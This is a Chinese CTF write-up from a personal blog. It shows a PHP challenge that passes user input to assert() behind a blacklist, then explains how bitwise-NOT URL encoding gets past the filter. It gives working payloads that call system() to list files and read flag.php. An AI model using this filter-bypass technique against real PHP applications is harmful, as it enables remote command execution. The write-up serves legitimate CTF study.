取反异或绕过

ctf url取反绕过

Word count: 217Reading time: 1 min

 2020/08/12   Share

前言：垃圾就要多学习

第五空间智能安全大赛-hate-php源码：

<?php
error_reporting(0);
if(!isset($_GET['code'])){
    highlight_file(__FILE__);
}else{
    $code = $_GET['code'];
    if (preg_match('/(f|l|a|g|\.|p|h|\/|;|\"|\'|\`|\||\[|\]|\_|=)/i',$code)) { 
        die('You are too good for me'); 
    }
    $blacklist = get_defined_functions()['internal'];
    foreach ($blacklist as $blackitem) { 
        if (preg_match ('/' . $blackitem . '/im', $code)) { 
            die('You deserve better'); 
        } 
    }
    assert($code);
}

题目把系统内置函数还有一些符号放进了黑名单，因此得绕过

取反异或绕过

assert跟eval的区别就是不用加分号

1
2
3

echo urlencode(~"system"); #%8C%86%8C%8B%9A%92
echo urlencode(~"ls");  #%93%8C
echo urlencode(~"cat flag.php"); #%9C%9E%8B%DF%99%93%9E%98%D1%8F%97%8F

最后拼接成

1	url?code=(~%8C%86%8C%8B%9A%92)((~%93%8C))

1	url?code=(~%8C%86%8C%8B%9A%92)((%9C%9E%8B%DF%99%93%9E%98%D1%8F%97%8F))

Author：HacKerQWQ

原文链接：https://hackerqwq.github.io/2020/08/12/%E7%AC%AC%E4%BA%94%E7%A9%BA%E9%97%B4%E6%99%BA%E8%83%BD%E5%AE%89%E5%85%A8%E5%A4%A7%E8%B5%9B-Web-hate-php/

发表日期：August 12th 2020, 4:17:47 pm

更新日期：April 18th 2021, 12:34:31 am

Next Post

动态调用函数以及nmap用法在网鼎杯的例题
Previous Post

[转载]sql注入绕过大集合

CATALOG

1. 第五空间智能安全大赛-hate-php源码：
2. 取反异或绕过



缺失模块。
1、请确保node版本大于6.2
2、在博客根目录（注意不是archer根目录）执行以下命令：
npm i hexo-generator-json-content --save
3、在根目录_config.yml里添加配置：

jsonContent:
  meta: false
  pages: false
  posts:
    title: true
    date: true
    path: true
    text: false
    raw: false
    content: false
    slug: false
    updated: false
    comments: false
    link: false
    permalink: false
    excerpt: false
    categories: true
    tags: true